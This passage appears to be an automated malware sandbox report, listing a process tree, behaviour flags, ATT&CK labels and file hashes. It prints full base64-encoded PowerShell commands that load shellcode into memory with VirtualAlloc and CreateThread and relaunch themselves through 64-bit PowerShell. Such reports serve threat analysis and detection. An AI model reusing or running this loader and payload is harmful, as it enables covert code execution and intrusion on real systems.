dwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAMgBLAEsALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAB3AHkAegBWACkAKQA7ACQANwBxADEAWAAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAGIAWgBMACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAGIAWgBMACAAJAA3AHEAMQBYACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkADcAcQAxAFgAIAAkAGUAIgA7AH0A3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3236 -
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JABvAFMAUwBaACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAbwBTAFMAWgAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiAGIALAAwAHgANQA3ACwAMAB4ADAAMQAsADAAeABhADkALAAwAHgAZgBhACwAMAB4AGQAOQAsADAAeABlADgALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAYQAsADAAeAAyADkALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGYALAAwAHgAOAAzACwAMAB4AGUAYQAsADAAeABmAGMALAAwAHgAMwAxACwAMAB4ADUAYQAsADAAeAAxADEALAAwAHgAMAAzACwAMAB4ADUAYQAsADAAeAAxADEALAAwAHgAZQAyACwAMAB4AGEAMgAsADAAeABmAGQALAAwAHgANAAxACwAMAB4ADcAOAAsADAAeAA0AGMALAAwAHgAZgBlACwAMAB4ADkAMQAsADAAeAAxAGQALAAwAHgAYwA1ACwAMAB4ADEAYgAsADAAeABhADAALAAwAHgAMQBkACwAMAB4AGIAMQAsADAAeAA2ADgALAAwAHgAOQAzACwAMAB4AGEAZAAsADAAeABiADIALAAwAHgAMwBkACwAMAB4ADEAOAAsADAAeAA0ADUALAAwAHgAOQA2ACwAMAB4AGQANQAsADAAeABhAGIALAAwAHgAMgBiACwAMAB4ADMAZQAsADAAeABkADkALAAwAHgAMQBjACwAMAB4ADgAMQAsADAAeAAxADgALAAwAHgAZAA0ACwAMAB4ADkAZAAsADAAeABiAGEALAAwAHgANQA4ACwAMAB4ADcANwAsADAAeAAxAGUALAAwAHgAYwAxACwAMAB4ADgAYwAsADAAeAA1ADcALAAwAHgAMQBmACwAMAB4ADAAYQAsADAAeABjADEALAAwAHgAOQA2ACwAMAB4ADUAOAAsADAAeAA3ADcALAAwAHgAMgBiACwAMAB4AGMAYQAsADAAeAAzADEALAAwAHgAZgAzACwAMAB4ADkAOQAsADAAeABmAGIALAAwAHgAMwA2ACwAMAB4ADQAOQAsADAAeAAyADEALAAwAHgANwA3ACwAMAB4ADAANAAsADAAeAA1AGYALAAwAHgAMgAxACwAMAB4ADYANAAsADAAeABkAGQALAAwAHgANQBlACwAMAB4ADAAMAAsADAAeAAzAGIALAAwAHgANQA1ACwAMAB4ADMAOQAsADAAeAA4ADIALAAwAHgAYgBkACwAMAB4AGIAYQAsADAAeAAzADEALAAwAHgAOABiACwAMAB4AGEANQAsADAAeABkAGYALAAwAHgANwBjACwAMAB4ADQAMgAsADAAeAA1AGQALAAwAHgAMgBiACwAMAB4ADAAYQAsADAAeAA1ADUALAAwAHgAYgA3ACwAMAB4ADYANQAsADAAeABmADMALAAwAHgAZgA5ACwAMAB4AGYANgAsADAAeAA0ADkALAAwAHgAMAA2ACwAMAB4ADAAMAAsADAAeAAzAGUALAAwAHgANgBkACwAMAB4AGYAOQAsADAAeAA3ADcALAAwAHgAMwA2ACwAMAB4ADgAZAAsADAAeAA4ADQALAAwAHgAOABmACwAMAB4ADgAZAAsADAAeABlAGYALAAwAHgANQAyACwAMAB4ADEAYQAsADAAeAAxADYALAAwAHgANQA3ACwAMAB4ADEAMAAsADAAeABiAGMALAAwAHgAZgAyACwAMAB4ADYAOQAsADAAeABmADUALAAwAHgANQBhACwAMAB4ADcAMAAsADAAeAA2ADUALAAwAHgAYgAyACwAMAB4ADIAOQAsADAAeABkAGUALAAwAHgANgBhACwAMAB4ADQANQAsADAAeABmAGUALAAwAHgANQA0ACwAMAB4ADkANgAsADAAeABjAGUALAAwAHgAMAAxACwAMAB4AGIAYgAsADAAeAAxAGUALAAwAHgAOQA0ACwAMAB4ADIANQAsADAAeAAxAGYALAAwAHgANwBhACwAMAB4ADQAZQAsADAAeAA0ADQALAAwAHgAMAA2ACwAMAB4ADIANgAsADAAeAAyADEALAAwAHgANwA5ACwAMAB4ADUAOAAsADAAeAA4ADkALAAwAHgAOQBlACwAMAB4AGQAZgAsADAAeAAxADIALAAwAHgAMgA0ACwAMAB4AGMAYQAsADAAeAA1ADIALAAwAHgANwA5ACwAMAB4ADIAMQAsADAAeAAzAGYALAAwAHgANQBlACwAMAB4ADgAMgAsADAAeABiADEALAAwAHgANQA3ACwAMAB4AGUAOQAsADAAeABmADEALAAwAHgAOAAzACwAMAB4AGYAOAAsADAAeAA0ADEALAAwAHgAOQBlACwAMAB4AGEAZgAsADAAeAA3ADEALAAwAHgANABmACwAMAB4ADUAOQAsADAAeABjAGYALAAwAHgAYQBiACwAMAB4ADMANwAsADAAeABmADUALAAwAHgAMgBlACwAMAB4ADUANAAsADAAeAA0ADcALAAwAHgAZABmACwAMAB4AGYANAAsADAAeAAwADAALAAwAHgAMQA3ACwAMAB4ADcANwAsADAAeABkAGMALAAwAHgAMgA4ACwAMAB4AGYAYwAsADAAeAA4ADcALAAwAHgAZQAxACwAMAB4AGYAYwAsADAAeAA1ADIALAAwAHgAZAA4ACwAMAB4ADQAZAAsADAAeABhAGYALAAwAHgAMQAyACwAMAB4ADgAOAAsADAAeAAyAGQALAAwAHgAMQBmACwAMAB4AGYAYQAsADAAeABjADIALAAwAHgAYQAxACwAMAB4ADQAMAAsADAAeAAxAGEALAAwAHgAZQBkACwAMAB4ADYAYgAsADAAeABlADkALAAwAHgAMwAyACwAMAB4ADAANQAsADAAeAA5ADQALAAwAHgAMQA2ACwAMAB4AGMAMgAsADAAeAA0ADIALAAwAHgAZgA1ACwAMAB4ADcANQAsADAAeABhADkALAAwAHgAZgA3ACwAMAB4ADgANwAsADAAeAA0AGIALAAwAHgAMQBlACwAMAB4AGMAMAAsADAAeAA1ADEALAAwAHgAOAAyACwAMAB4ADAANAAsADAAeAA0ADUALAAwAHgAZgBkACwAMAB4AGIAMQAsADAAeABhADAALAAwAHgAYwBiACwAMAB4ADcAMgAsADAAeAA2ADgALAAwAHgANAA3ACwAMAB4ADYANgAsADAAeAAxADIALAAwAHgANwA0ACwAMAB4AGYAZgAsADAAeAAyAGYALAAwAHgAZgA0ACwAMAB4ADQAMAAsADAAeAA3AGYALAAwAHgAZAAwACwAMAB4AGQAMAAsADAAeAAyADIALAAwAHgAMwBmACwAMAB4ADMAMwAsADAAeABiADEALAAwAHgAMwBlACwAMAB4AGUAZgAsADAAeAAyADMALAAwAHgANAA3ACwAMAB4ADMAZgAsADAAeAAxAGUALAAwAHgAZQA4ACwAMAB4AGMAZQAsADAAeABkADkALAAwAHgANABhACwAMAB4ADAAMAAsADAAeAA4ADcALAAwAHgANwAyACwAMAB4AGUAMgAsADAAeABiADkALAAwAHgAOAAyACwAMAB4ADAAOQAsADAAeAA5ADMALAAwAHgANAA2ACwAMAB4ADEAOQAsADAAeAA3ADQALAAwAHgAOQAzACwAMAB4AGMAZAAsADAAeABhAGUALAAwAHgAOAA4ACwAMAB4ADUAZAAsADAAeAAyADYALAAwAHgAZABhACwAMAB4ADkAYQAsADAAeAAwADkALAAwAHgAYwA2ACwAMAB4ADkAMQAsADAAeABjADEALAAwAHgAOQBmACwAMAB4AGQAOQAsADAAeAAwAGYALAAwAHgANgBmACwAMAB4ADEAZgAsADAAeAA0AGMALAAwAHgAYgA0ACwAMAB4ADIANgAsADAAeAA0ADgALAAwAHgAZgA4ACwAMAB4AGIANgAsADAAeAAxAGYALAAwAHgAYgBlACwAMAB4AGEANwAsADAAeAA0ADkALAAwAHgANABhACwAMAB4AGIANQAsADAAeAA2AGUALAAwAHgAZABjACwAMAB4ADMANQAsADAAeABhADEALAAwAHgAOABlACwAMAB4ADMAMAAsADAAeABiADYALAAwAHgAMwAxACwAMAB4AGQAOQAsADAAeAA1AGEALAAwAHgAYgA2ACwAMAB4ADUAOQAsADAAeABiAGQALAAwAHgAMwBlACwAMAB4AGUANQAsADAAeAA3AGMALAAwAHgAYwAyACwAMAB4AGUAYQAsADAAeAA5ADkALAAwAHgAMgBkACwAMAB4ADUANwAsADAAeAAxADUALAAwAHgAYwA4ACwAMAB4ADgAMgAsADAAeABmADAALAAwAHgANwBkACwAMAB4AGYANgAsADAAeABmAGQALAAwAHgAMwA3ACwAMAB4ADIAMgAsADAAeAAwADkALAAwAHgAMgA4ACwAMAB4AGMANgAsADAAeAAxAGUALAAwAHgAZABjACwAMAB4ADEANAAsADAAeABiAGMALAAwAHgANABlACwAMAB4AGQAYwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAMgBLAEsAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkADIASwBLAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJAAyAEsASwAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwA=4⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1636 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ecwugerd\ecwugerd.cmdline"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4628 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES885A.tmp" "c:\Users\Admin\AppData\Local\Temp\ecwugerd\CSCF614E8EAB1614B4583BD7E6B30F7CAD6.TMP"6⤵
- System Location Discovery: System Language Discovery
PID:4460
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5d52a87a4ec1c252ceb72c3e366bb0998
SHA1fc5a9890ef3da9e2cda434c347fd2a3ff75ee0de
SHA2562509f9901ccd7025ce1b41364fdff146734de5e89262b3ded44054ba0e4a2708
SHA5129b46091f633211ea6e80012fbdae755c40581dfe610d603b9a957cbf13c42a54d3d2c098a240beaaf1fa24d65c3f933b05db04908ff93ea4b5877986a1b9a7a4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD58bccf198bce3ec3639b6da180ca82ab3
SHA19f88cf888199c5023d24cac0f2401523734c69c2
SHA256fd915122d4d428d466221f632231f85ddfcc355dc53377752c73a833a4116b0b
SHA512079003ff35228bf3f3a27d439e0a152381bf176cede2079162584c6ad8374cd8e2399f5d20d9fca471d6e3dc67a262d72d01204fc66d18da03014aa2e0979cc5
-
Filesize
652B
MD5f49106bdcf140840a2b363bddd434f46
SHA164c2974035a064aa93c7d2fb363cf93ba195d459
SHA256ed40c39d9bec214270623e9994069cdab9af4343066726abcbd8ec22750f54ae
SHA5121341d745c45300990d70e23a2523e448cc51bddffe91db8c29f533dcc8b7c6f26f68d91dc13fe23e558c416882ba658e033061e1d3dc1978b85ee16670edc0c7
-
Filesize
557B
MD57319070c34daa5f6f2ece2dfc07119ee
SHA1f26a4a48518a5608e93c8b77368f588b0433973c
SHA256b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc
SHA51234169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd
-
Filesize
369B
MD554b2277da8ac4201c6c16c92d47b73e0
SHA14b0cc7030e8f9e357e865ac93a3b53e496fb4a08
SHA256fdf4ea03c97b22f2f121b8e783858062432b1dce4657eac1940f706c46661478
SHA512a381996ff1085fd46770f5400fa9dc78fdca692608ae31b3822ea4b94e2344af626db7c2f2cb0ddf4b0dc53e5eeab5cd1dc32dddac133b80b532a526bf1460bc